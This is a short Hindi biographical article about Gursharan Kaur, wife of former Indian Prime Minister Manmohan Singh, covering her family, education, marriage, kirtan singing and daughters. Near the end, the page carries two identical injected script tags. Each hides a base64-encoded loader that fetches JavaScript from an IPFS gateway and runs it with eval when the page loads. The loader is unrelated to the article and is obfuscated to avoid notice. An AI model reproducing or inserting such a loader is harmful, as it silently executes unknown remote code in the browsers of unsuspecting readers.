गुरशरण कौर
गुरशरण कौर (अंग्रेज़ी:Gursharan Kaur) भारत के प्रधानमंत्री डॉ. मनमोहन सिंह की पत्नी हैं।
जीवन परिचय
गुरशरण का जन्म सरदार छत्तर सिंह कोहली, और सरदारनी भागवंती कौर के घर सन 1937 में जालंधर में हुआ था। इनके पिता बर्मा शैल में एक कर्मचारी थे। इनकी प्राथमिक शिक्षा गुरु नानक कन्या पाठशाला में हुई। इसके बाद इन्होंने पटियाला के सरकारी महिला कॉलेज से और इसके बाद खालसा कॉलेज अमृतसर से डिग्री प्राप्त की।
- विवाह
गुरशरण कौर का विवाह डॉ. मनमोहन सिंह से 1958 में अमृतसर में हुआ। दिल्ली के सिख समुदाय में गुरशरण कौर को कीर्तन करने के लिए जाना जाता है। सरदार मनमोहन सिंह को जब विश्व बैंक की एक नौकरी के सिलसिले मे अमेरिका जाना पड़ा तो यह उनके साथ गयीं पर इससे पहले इन्होंने ऑल इंडिया रेडियो पर कई बार कीर्तन और गाने गाये थे। इनकी तीन पुत्रियाँ हैं- उपिन्दर सिंह, दमनदीप कौर और अमृत सिंह। तीनो ही पुत्रियाँ अपने अपने क्षेत्र मे काफ़ी सफल हैं।
|
|
|
|
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख